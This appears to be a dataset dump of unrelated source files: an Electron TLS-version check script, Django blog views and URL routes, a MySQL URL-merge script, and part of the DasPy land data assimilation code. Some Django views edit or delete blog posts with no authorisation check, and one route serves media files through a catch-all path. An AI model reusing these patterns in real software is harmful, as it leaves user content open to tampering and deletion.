text stringlengths 8 6.05M |
|---|
#!/usr/bin/env python
from __future__ import print_function
import json
import os
import ssl
import subprocess
import sys
import urllib2
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def check_tls(verbose):
process = subprocess.Popen(
'node lib/tls',
cwd=os.path.dirname(os.path.realpath(__file__)),
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
port = process.stdout.readline()
localhost_url = 'https://localhost:' + port
response = json.load(urllib2.urlopen(localhost_url, context=ctx))
tls = response['protocol']
process.wait()
if sys.platform == "linux" or sys.platform == "linux2":
tutorial = "./docs/development/build-instructions-linux.md"
elif sys.platform == "darwin":
tutorial = "./docs/development/build-instructions-macos.md"
elif sys.platform == "win32":
tutorial = "./docs/development/build-instructions-windows.md"
else:
tutorial = "build instructions for your operating system" \
+ "in ./docs/development/"
if tls == "TLSv1" or tls == "TLSv1.1":
print("Your system/python combination is using an outdated security" \
+ "protocol and will not be able to compile Electron. Please see " \
+ tutorial + "." \
+ "for instructions on how to update Python.")
sys.exit(1)
else:
if verbose:
print("Your Python is using " + tls + ", which is sufficient for " \
+ "building Electron.")
if __name__ == '__main__':
check_tls(True)
sys.exit(0)
|
import datetime
from django.contrib.contenttypes.models import ContentType
from django.core.paginator import Paginator
from django.db.models import Count
from django.http import HttpResponseRedirect, Http404, HttpResponse
from django.shortcuts import render, get_object_or_404
from django.urls import reverse
from blog.forms import BlogForm, EntryForm, TopicForm
from blog.models import Blog, Entry, Topic, Tag
from blog_django.settings import PAGE_NUM
from comment.forms import CommentForm
from comment.models import Comment
from read_statistics.utils import read_statistics
def common(request, blog_list=Blog.objects.all()): # 默认为空不知道有没有问题
paginator = Paginator(blog_list, PAGE_NUM) # Show 4 blogs per page
page = request.GET.get('page')
blogs = paginator.get_page(page)
# 统计按年月分的博客数
blog_date_list = Blog.objects.dates('pub_date', 'month', order='DESC')
print(blog_date_list)
blog_date_dict = {}
for blog_date in blog_date_list:
blog_date_dict[blog_date] = Blog.objects.filter(pub_date__year=blog_date.year, pub_date__month=blog_date.month).count()
context = {
'blogs': blogs,
'count': paginator.count,
'blog_tag_list': Tag.objects.annotate(blog_count=Count('blog')),
'blog_date_dict': blog_date_dict,
}
return context
def pages(request, list=Blog.objects.all()):
paginator = Paginator(list, PAGE_NUM) # Show 6 blogs per page
page = request.GET.get('page')
blogs = paginator.get_page(page)
return blogs
def blogs(request):
context = common(request)
return render(request, 'blog/blogs.html', context)
def blog(request, blog_id):
blog = Blog.objects.get(id=blog_id)
# 阅读数统计
read_cookie_key = read_statistics(request, blog)
# 上一篇下一篇
previous_page = Blog.objects.filter(pub_date__gt=blog.pub_date).last() # gte两篇文章同时发表,对于一个用户是不正确的,多用户有很可能
next_page = Blog.objects.filter(pub_date__lt=blog.pub_date).first()
# 获取评论对象
blog_content_type = ContentType.objects.get_for_model(blog)
comments = Comment.objects.filter(content_type=blog_content_type, object_id=blog.id)
context = {
'blog': blog,
'previous_page': previous_page,
'next_page': next_page,
'comments': comments,
'comment_form': CommentForm(initial={'content_type': blog_content_type.model, 'object_id': blog_id}),
}
response = render(request, 'blog/blog.html', context)
response.set_cookie(read_cookie_key, 'true')
return response
def new_blog(request):
"""添加新博客"""
if request.method != 'POST':
# 未提交数据:创建一个新表单
form = BlogForm()
else:
# POST提交的数据,对数据进行处理
form = BlogForm(request.POST)
if form.is_valid():
new_blog = form.save(commit=False)
new_blog.author = request.user
new_blog.save()
return HttpResponseRedirect(reverse('blog:blogs'))
context = {'form': form}
return render(request, 'blog/new_blog.html', context)
def blog_with_data(request, year, month):
blog_list = Blog.objects.filter(pub_date__year=year, pub_date__month=month)
# date = datetime.date(year=year, month=month, day=1)
# context = {
# 'date': date
# }
context = {}
context.update(common(request, blog_list=blog_list))
return render(request, 'blog/blog_with_data.html', context)
def blog_with_tag(request, tag_id):
tag = get_object_or_404(Tag, pk=tag_id)
blog_list = Blog.objects.filter(tag=tag)
context = {
'tag': tag,
}
context.update(common(request, blog_list=blog_list))
return render(request, 'blog/blog_with_tag.html', context)
def topics(request):
# 取全部的博客
topics = Topic.objects.all()
context = {
'topics': pages(request, list=topics) # 对全部博客进行分页
}
return render(request, 'blog/topics.html', context)
def topic(request, topic_id):
topic = Topic.objects.get(id=topic_id)
entries = topic.entry_set.all().order_by('-pub_date') # 如果为空报错
context = {
'topic': topic,
'entries': pages(request, list=entries), # 对全部条目进行分页
}
return render(request, 'blog/topic.html', context)
def new_topic(request):
"""添加新博客"""
if request.method != 'POST':
# 未提交数据:创建一个新表单
form = TopicForm()
else:
# POST提交的数据,对数据进行处理
form = TopicForm(data=request.POST)
if form.is_valid():
new_topic = form.save(commit=False)
new_topic.author = request.user
new_topic.save()
return HttpResponseRedirect(reverse('blog:topics'))
context = {'form': form}
return render(request, 'blog/new_topic.html', context)
def new_entry(request, topic_id):
topic = Topic.objects.get(id=topic_id)
if topic.author != request.user: raise Http404
if request.method != 'POST':
# 未提交数据:创建一个新表单
form = EntryForm()
else:
# POST提交的数据,对数据进行处理
form = EntryForm(data=request.POST)
if form.is_valid():
new_entry = form.save(commit=False)
new_entry.topic = topic
new_entry.save()
return HttpResponseRedirect(reverse('blog:topic', args=[topic_id]))
context = {'topic': topic, 'form': form}
return render(request, 'blog/new_entry.html', context)
def edit_entry(request, entry_id):
"""编辑条目"""
entry = Entry.objects.get(id=entry_id)
topic = entry.topic
if topic.author != request.user: raise Http404
if request.method != 'POST':
# 未提交数据:创建一个新表单
form = EntryForm(instance=entry)
else:
# POST提交的数据,对数据进行处理
form = EntryForm(instance=entry, data=request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse('blog:topic', args=[topic.id]))
context = {'entry': entry, 'topic': topic, 'form': form}
return render(request, 'blog/edit_entry.html', context)
def all(request):
return render(request, 'blog/all.html')
def edit_blog(request, blog_id):
blog = Blog.objects.get(id=blog_id)
if request.method != "POST":
form = BlogForm(instance=blog)
else:
form = BlogForm(instance=blog, data=request.POST)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse('blog:blog', args=[blog_id]))
context = {
'blog': blog,
'form': form,
}
return render(request, 'blog/edit_blog.html', context)
def delete_blog(request, blog_id):
blog = Blog.objects.get(id=blog_id)
Blog.delete(blog)
return HttpResponseRedirect(reverse('blog:blogs'))
|
from django.conf.urls import url
from django.conf import settings
from django.conf.urls.static import static, serve
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from . import views
urlpatterns = [
url(r'^$', views.AgendaView.as_view(), name='event_list'),
url(r'^(?P<path>.*)$', serve, {'document_root': settings.MEDIA_ROOT}),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) + staticfiles_urlpatterns()
|
import os
import json
import time
# connect mysql db
from cr_1111.myConnect import myConnect
"""
IEK URL 合併回 mysql ieknews
"""
if __name__ == "__main__":
cnt = 0
# mysql connect
mydb = myConnect()
urldir = r'E:\專題\crawler_data\iek_url'
# os.walk 會走到檔案才停下來
for dir_path, dir_names, file_names in os.walk(urldir):
for single_file in file_names:
if not single_file.startswith("."):
# print(single_file)
with open(os.path.join(dir_path, single_file)) as f:
data = json.load(f)
newstitle = data.get("newstitle").strip()
newsurl = data.get("url").strip()
iekseq = mydb.queryone("select seq from ieknews where otitle=%s", newstitle)
if iekseq:
sql = "update ieknews set url=%s where seq=%s"
mydb.execmmit(sql, (newsurl, iekseq[0]))
cnt += 1
print(iekseq, newstitle, newsurl)
#print(type(newsurl), type(iekseq))
# mysql disconnect
mydb.close()
print('-------------- Done -------------------')
print(cnt) |
# -*- coding: utf-8 -*-
'''
Copyright of DasPy:
Author - Xujun Han (Forschungszentrum Jülich, Germany)
x.han@fz-juelich.de, xujunhan@gmail.com
DasPy was funded by:
1. Forschungszentrum Jülich, Agrosphere (IBG 3), Jülich, Germany
2. Cold and Arid Regions Environmental and Engineering Research Institute, Chinese Academy of Sciences, Lanzhou, PR China
3. Centre for High-Performance Scientific Computing in Terrestrial Systems: HPSC TerrSys, Geoverbund ABC/J, Jülich, Germany
Please include the following references related to DasPy:
1. Han, X., Li, X., He, G., Kumbhar, P., Montzka, C., Kollet, S., Miyoshi, T., Rosolem, R., Zhang, Y., Vereecken, H., and Franssen, H. J. H.:
DasPy 1.0 : the Open Source Multivariate Land Data Assimilation Framework in combination with the Community Land Model 4.5, Geosci. Model Dev. Discuss., 8, 7395-7444, 2015.
2. Han, X., Franssen, H. J. H., Rosolem, R., Jin, R., Li, X., and Vereecken, H.:
Correction of systematic model forcing bias of CLM using assimilation of cosmic-ray Neutrons and land surface temperature: a study in the Heihe Catchment, China, Hydrology and Earth System Sciences, 19, 615-629, 2015a.
3. Han, X., Franssen, H. J. H., Montzka, C., and Vereecken, H.:
Soil moisture and soil properties estimation in the Community Land Model with synthetic brightness temperature observations, Water Resour Res, 50, 6081-6105, 2014a.
4. Han, X., Franssen, H. J. H., Li, X., Zhang, Y. L., Montzka, C., and Vereecken, H.:
Joint Assimilation of Surface Temperature and L-Band Microwave Brightness Temperature in Land Data Assimilation, Vadose Zone J, 12, 0, 2013.
'''
import os, sys, time, datetime, random, math, gc, subprocess, glob, signal, string, shutil, warnings, multiprocessing, socket, getpass, ctypes, platform, functools, copy
import numpy, scipy, scipy.stats, scipy.signal, netCDF4, scipy.ndimage
import pp,imp
#os.system("taskset -pc 0-47 %d" % os.getpid())
sys.path.append('SysModel/CLM')
sys.path.append('Utilities')
sys.path.append('Utilities/Soil')
sys.path.append('Algorithm')
sys.path.append('Algorithm/GSIF')
sys.path.append('Algorithm/ReBEL')
sys.path.append('Algorithm/Noise')
sys.path.append('Algorithm/MultiScale')
sys.path.append('Algorithm/Geostatistics/CorrelationModel')
sys.path.append('Algorithm/Geostatistics/Scripts')
sys.path.append('ForcingData')
from Call_CLM_CESM import *
from ParFor import *
from Read_Soil_Texture import *
from DAS_Assim_Common import *
from DAS_Driver_Common import *
def CLM_Assim_Common(Block_Index, Model_Driver, Def_PP, Def_First_Run, Def_Print, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs, eps, msw_infl, parm_infl, Post_Inflation_Alpha, Def_ParFor, Row_Numbers, Col_Numbers, Ensemble_Number, Ensemble_Number_Predict, Call_Gstat_Flag, Assim_Algorithm_Name, Model_State, E0_SysModel, E0_ObsModel, \
Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Proj_String, Z_Resolution, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper, Variable_List,
Grid_Resolution_CEA, Prop_Grid_Array_Sys, Prop_Grid_Array_H_Trans, Model_Variance, Write_DA_File_Flag, Mask, Mask_Index, Land_Mask_Data, Observation_Variance, SensorQuantity, SensorQuantity_Index,
Observation_NLats, Observation_NLons, Observation_Longitude, Observation_Latitude, Observation_Matrix, DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, Soil_Layer_Index_DA, Soil_Layer_Num, ParFlow_Layer_Num, omp_get_num_procs_ParFor, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type, NSLOTS, DAS_Output_Path, Region_Name,
Variable_Assimilation_Flag, Teta_Residual, Teta_Saturated, Teta_Field_Capacity, Teta_Wilting_Point, SensorType, SensorVariable, SensorResolution, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial,
Observation_Corelation_Par, Bias_Estimation_Option_Model, Bias_Estimation_Option_Obs, Low_Ratio_Par, High_Ratio_Par,
Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
CLM_Ground_Temperature_Ensemble_Mat,CLM_Vegetation_Temperature_Ensemble_Mat,CLM_Soil_Moisture_Ensemble_Mat,CLM_Soil_Temperature_Ensemble_Mat, PF_PRESSURE_Ensemble_Mat, PF_SATURATION_Ensemble_Mat,
Prop_Grid_Array_Sys_parm_infl, CLM_Latent_Heat_parm_infl, CLM_Surface_Temperature_parm_infl, CLM_Ground_Temperature_parm_infl,CLM_Vegetation_Temperature_parm_infl, CLM_Soil_Moisture_parm_infl,CLM_Soil_Temperature_parm_infl, PF_SATURATION_parm_infl,
CLM_Ground_Temperature_Ensemble_Mat_Bias,CLM_Vegetation_Temperature_Ensemble_Mat_Bias,CLM_Soil_Moisture_Ensemble_Mat_Bias,CLM_Soil_Temperature_Ensemble_Mat_Bias,
CLM_Surface_Temperature_parm_infl_Bias, CLM_Ground_Temperature_parm_infl_Bias,CLM_Vegetation_Temperature_parm_infl_Bias, CLM_Soil_Moisture_parm_infl_Bias,CLM_Soil_Temperature_parm_infl_Bias,
Prop_Grid_Array_Bias, Observation_Bias, Prop_Grid_Array_Sys_parm_infl_Bias, Observation_parm_infl_Bias, Def_CDF_Matching, Plot_Analysis, Parameter_Optimization_Flag,
Start_Month, maxpft, Feedback_Assim, Dim_Soil_Par, Soil_Par_Sens, Dim_Veg_Par, Veg_Par_Sens, Dim_PFT_Par, PFT_Par_Sens, Dim_Hard_Par, Hard_Par_Sens, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, \
Parameter_Soil_Space_Ensemble, Parameter_Soil_Space_parm_infl, Parameter_Veg_Space_Ensemble, Parameter_Veg_Space_parm_infl, Parameter_PFT_Space_Ensemble, Parameter_PFT_Space_parm_infl, Parameter_Hard_Space_Ensemble, Parameter_Hard_Space_parm_infl, Parameter_Min_Max, \
Soil_Layer_Thickness_Ratio, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD, Par_Veg_Uniform_STD, Par_PFT_Uniform_STD, Par_Hard_Uniform_STD,
Saturation_SSat, Saturation_SRes, Saturation_N, Saturation_Alpha, DateString_Plot, *vartuple):
pyper = imp.load_source("pyper",DasPy_Path+"Utilities/pyper.py")
Call_ReBEL_Octave = imp.load_source("Call_ReBEL_Octave",DasPy_Path+"Algorithm/ReBEL/Call_ReBEL_Octave.py")
gssm_das_octave = []
letkf = imp.load_source("letk",DasPy_Path+"Algorithm/DAS/letkf.py")
letkf_common = imp.load_dynamic("letkf_common",DasPy_Path+"Algorithm/DAS/letkf_common.so")
octave = vartuple[0]
Analysis_Grid = numpy.zeros((Row_Numbers, Col_Numbers),dtype=numpy.float32)
Localization_Map_Mask = numpy.zeros((Row_Numbers, Col_Numbers),dtype=numpy.float32)
Analysis_Grid_Array = numpy.zeros((Ensemble_Number, Row_Numbers, Col_Numbers),dtype=numpy.float32)
Innovation_State = numpy.zeros_like(Analysis_Grid_Array,dtype=numpy.float32)
Increments_State = numpy.zeros_like(Analysis_Grid_Array,dtype=numpy.float32)
#--------------Find Available Observations
Observation_Matrix_Temp = numpy.copy(Observation_Matrix)
Obs_Index = numpy.where(Observation_Matrix_Temp.flatten() != NAvalue)
Obs_Index_Dim = numpy.size(Obs_Index)
if Def_Print:
print "Obs_Index_Dim", Obs_Index_Dim
del Observation_Matrix_Temp
#--------------- Save the Observation Grid for DA -----------------
Obs_Grid = numpy.zeros((Obs_Index_Dim, 3),dtype=numpy.float32)
Obs_Grid[:, 0] = Observation_Longitude.flatten()[Obs_Index]
Obs_Grid[:, 1] = Observation_Latitude.flatten()[Obs_Index]
Obs_Grid[:, 2] = Observation_Matrix.flatten()[Obs_Index]
if Write_DA_File_Flag:
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/X_Diff.txt', Mask[:, 0] - Observation_Longitude.flatten())
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/Y_Diff.txt', Mask[:, 1] - Observation_Latitude.flatten())
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/Obs_Grid.txt', Obs_Grid)
#------------------------- Prepare DA --------------------
State_DIM_Single_Layer = numpy.size(numpy.where(Mask_Index == False))
# Expand the dimension to include the deep layers
Mask_Copy = numpy.copy(Mask)
Mask_Index_Single_Layer = numpy.copy(Mask_Index)
Def_ReBEL_Temp = Def_ReBEL
Def_Localization_Temp = Def_Localization
if Def_ReBEL_Temp == 1:
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# For State Estimation
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
if SensorType == "InSitu":
for i in range(Soil_Layer_Num - 5 -1):
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
for i in range(Soil_Layer_Num + 2):
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
else:
for i in range(Soil_Layer_Num - 5):
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
for i in range(Soil_Layer_Num + 2):
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
elif (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature"):
for i in range(Soil_Layer_Num + 2):
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
for i in range(Soil_Layer_Num - 5):
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
else:
# For Parameter Estimation
if Soil_Par_Sens_Dim >= 1:
for Par_Index in range(Dim_Soil_Par):
if Soil_Par_Sens[Par_Index]:
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
if PFT_Par_Sens_Dim >= 1:
for Par_Index in range(Dim_PFT_Par):
if PFT_Par_Sens[Par_Index]:
Mask_Index = numpy.append(Mask_Index,Mask_Index_Single_Layer)
Mask = numpy.vstack((Mask,Mask_Copy))
if Def_Print:
print "numpy.shape(Mask_Index),numpy.shape(Mask)",numpy.shape(Mask_Index),numpy.shape(Mask)
nx = numpy.size(numpy.where(Mask_Index == False)) # Number of Model Grids
ny = Obs_Index_Dim # Number of the Observations
if Def_Print:
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# For State Estimatio
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
if SensorType == "InSitu":
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
print "The Number of Model Grid is:", nx / (Soil_Layer_Num-5+17)
else:
print "The Number of Model Grid is:", nx / (Soil_Layer_Num-5)
else:
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
print "The Number of Model Grid is:", nx / (Soil_Layer_Num-5+1+17)
else:
print "The Number of Model Grid is:", nx / (Soil_Layer_Num-5+1)
elif (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature"):
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
print "The Number of Model Grid is:", nx / (Soil_Layer_Num+3+10)
else:
print "The Number of Model Grid is:", nx / (Soil_Layer_Num+3)
else:
print "The Number of Model Grid is:", nx / (1)
else:
# For Parameter Estimation
if Soil_Par_Sens_Dim >= 1:
print "The Number of Model Grid is:", nx / (Soil_Par_Sens_Dim+1)
if PFT_Par_Sens_Dim >= 1:
print "The Number of Model Grid is:", nx / (PFT_Par_Sens_Dim+1)
print "The Number of Observation Grid is:", ny
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# For State Estimation
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
if SensorType == "InSitu":
if (nx / (Soil_Layer_Num-5+17)) < ny:
print "******************nx / (Soil_Layer_Num-5+17) < ny************************",nx / (Soil_Layer_Num-5+17),ny
os.abort()
else:
if (nx / (Soil_Layer_Num-5+1+17)) < ny:
print "******************nx / (Soil_Layer_Num-5+1+17) < ny************************",nx / (Soil_Layer_Num-5+1+17),ny
os.abort()
else:
if SensorType == "InSitu":
if (nx / (Soil_Layer_Num-5)) < ny:
print "******************nx / (Soil_Layer_Num-5) < ny************************",nx / (Soil_Layer_Num-5),ny
os.abort()
else:
if (nx / (Soil_Layer_Num-5+1)) < ny:
print "******************nx / (Soil_Layer_Num-5+1) < ny************************",nx / (Soil_Layer_Num-5+1),ny
os.abort()
elif (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature"):
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
if (nx / (Soil_Layer_Num+3+10)) < ny:
print "******************nx / (Soil_Layer_Num+3+10) < ny************************",nx / (Soil_Layer_Num+3+10),ny
os.abort()
else:
if (nx / (Soil_Layer_Num+3)) < ny:
print "******************nx / (Soil_Layer_Num+3) < ny************************",nx / (Soil_Layer_Num+3),ny
os.abort()
else:
if (nx / (1)) < ny:
print "******************nx / (1) < ny************************",nx / (1),ny
os.abort()
else:
# For Parameter Estimation
if Soil_Par_Sens_Dim >= 1:
if (nx / (Soil_Par_Sens_Dim + 1)) < ny:
print "******************nx / (numpy.size(numpy.where(Soil_Par_Sens == True)) + 1)************************",nx / (Soil_Par_Sens_Dim + 1),ny
os.abort()
if PFT_Par_Sens_Dim >= 1:
if (nx / (PFT_Par_Sens_Dim + 1)) < ny:
print "******************nx / (numpy.size(numpy.where(PFT_Par_Sens == True)) + 1)************************",nx / (PFT_Par_Sens_Dim + 1),ny
os.abort()
#H Operator where the Value of H is 1.0 at the Location of the Observed Grid
Mask_False = numpy.where(Mask_Index == False)
Mask_False_Single_Layer = numpy.where(Mask_Index_Single_Layer == False)
if Def_Print:
print "Mask_False",Mask_False[0]
print "Mask_False_Single_Layer",Mask_False_Single_Layer
h = numpy.zeros((ny, nx),dtype=numpy.integer)
#h[~Mask_Index,~Mask_Index] = 1.0
if Def_Print >= 3:
print "Obs_Index",Obs_Index[0]
if Def_ParFor:
#print "State_DIM_Single_Layer",State_DIM_Single_Layer,numpy.shape(h[:,0:State_DIM_Single_Layer])
#----------------------------------******* Using ParFor to Accelerate H_Operator"
ParFor_H_Operator(h[:,0:State_DIM_Single_Layer],ny,Mask_False_Single_Layer[0],Obs_Index[0],Variable_Assimilation_Flag[Variable_List.index("Soil_Moisture")],\
SensorVariable,SensorType,Soil_Layer_Index_DA,State_DIM_Single_Layer,\
Parameter_Optimization_Flag,Bias_Estimation_Option_Model[Variable_List.index(SensorVariable)], Bias_Estimation_Option_Obs[Variable_List.index(SensorVariable)],DAS_Depends_Path,omp_get_num_procs_ParFor)
else:
for ny_index in range(ny):
if numpy.size(numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])) > 0:
#print numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# For State Estimation
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
if SensorType == "InSitu":
#print Mask_False_Single_Layer[0],Obs_Index[0][ny_index],numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])
H_Col_Index = numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0] + Soil_Layer_Index_DA*State_DIM_Single_Layer
else:
#print Mask_False_Single_Layer[0],Obs_Index[0][ny_index],numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])
H_Col_Index = numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]
else:
H_Col_Index = numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]
elif (not Parameter_Optimization_Flag) and ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1)):
# For Bias Estimation
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
H_Col_Index = numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]
else:
H_Col_Index = numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]
else:
# For Bias Estimation
H_Col_Index = numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]
#print "numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]",numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]
h[ny_index,H_Col_Index] = 1
#
#-------------------------------------=========== Do Data Assimilation ========================================================'
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# For State Estimation
if Write_DA_File_Flag:
#numpy.savetxt(DasPy_Path+"Analysis/DAS_Temp/h.txt", h) # h is too large to save
numpy.savetxt(DasPy_Path+"Analysis/DAS_Temp/E0_SysModel_State.txt", E0_SysModel)
numpy.savetxt(DasPy_Path+"Analysis/DAS_Temp/E0_ObsModel_State.txt", E0_ObsModel)
else:
if Write_DA_File_Flag:
#numpy.savetxt(DasPy_Path+"Analysis/DAS_Temp/h.txt", h) # h is too large to save
numpy.savetxt(DasPy_Path+"Analysis/DAS_Temp/E0_SysModel_Parameter.txt", E0_SysModel)
numpy.savetxt(DasPy_Path+"Analysis/DAS_Temp/E0_ObsModel_Parameter.txt", E0_ObsModel)
# 4D-LETKF
nwindow = 1 # time window for 4D-LETKF
R = numpy.diagflat(Observation_Variance.flatten()[Obs_Index])
GridSize_Sys = abs((MODEL_X_Right - MODEL_X_Left) / Col_Numbers)
GridSize_Obs = abs((MODEL_X_Right - MODEL_X_Left) / Col_Numbers)
#------------------------- Call Assimilation Algorithm --------------------"
ftype = Assim_Algorithm_Name
bf = []
alpha_bias = 0.5 # LETKF Bias Correction Turning Parameter
B = []
gssm_name = 'CLM'
Gssm_model_tag = 'GSSM_CLM'
U1 = [0]
U2 = [0]
#print numpy.shape(Mask[~Mask_Index,:])
#print numpy.shape(E0_SysModel[:,:]),numpy.shape(E0_ObsModel[:,:])
#print nx,ny,numpy.shape(Mask[~Mask_Index,:])
print 'There are ', nx, ' Grids need to be processed! ','nthreads',omp_get_num_procs_ParFor,' Num_Local_Obs ',Num_Local_Obs,"for Block",Block_Index
if Def_Print:
print "numpy.shape(parm_infl)",numpy.shape(parm_infl)
#numpy.savetxt("E0_SysModel.txt",E0_SysModel[:,0:Ensemble_Number])
#numpy.savetxt("E0_ObsModel.txt",E0_ObsModel)
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# For State Estimation
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
State_Layer_Num_Single_Column = 11 + ParFlow_Layer_Num
if Feedback_Assim:
State_Layer_Num_Single_Column = 11 + 15
elif (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature"):
State_Layer_Num_Single_Column = 18
if Feedback_Assim:
State_Layer_Num_Single_Column = 18 + 10
else:
State_Layer_Num_Single_Column = 1
elif Parameter_Optimization_Flag:
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
State_Layer_Num_Single_Column = 1
if Feedback_Assim:
State_Layer_Num_Single_Column = 1
elif (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature"):
State_Layer_Num_Single_Column = 1
if Feedback_Assim:
State_Layer_Num_Single_Column = 1
else:
State_Layer_Num_Single_Column = 1
if PFT_Par_Sens_Dim >= 1:
Par_Uniform_STD = numpy.asarray(Par_PFT_Uniform_STD,numpy.float32)
Par_Sens_Dim = PFT_Par_Sens_Dim
elif Soil_Par_Sens_Dim >= 1:
Par_Uniform_STD = numpy.asarray(Par_Soil_Uniform_STD,numpy.float32)
Par_Sens_Dim = Soil_Par_Sens_Dim
else:
Par_Uniform_STD = numpy.zeros(1,numpy.float32)
Par_Sens_Dim = 1
if Def_Print:
print "Par_Uniform_STD",Par_Uniform_STD,"Par_Sens_Dim",Par_Sens_Dim
Bias_Forecast_Model_Option = Bias_Estimation_Option_Model[Variable_List.index(SensorVariable)]
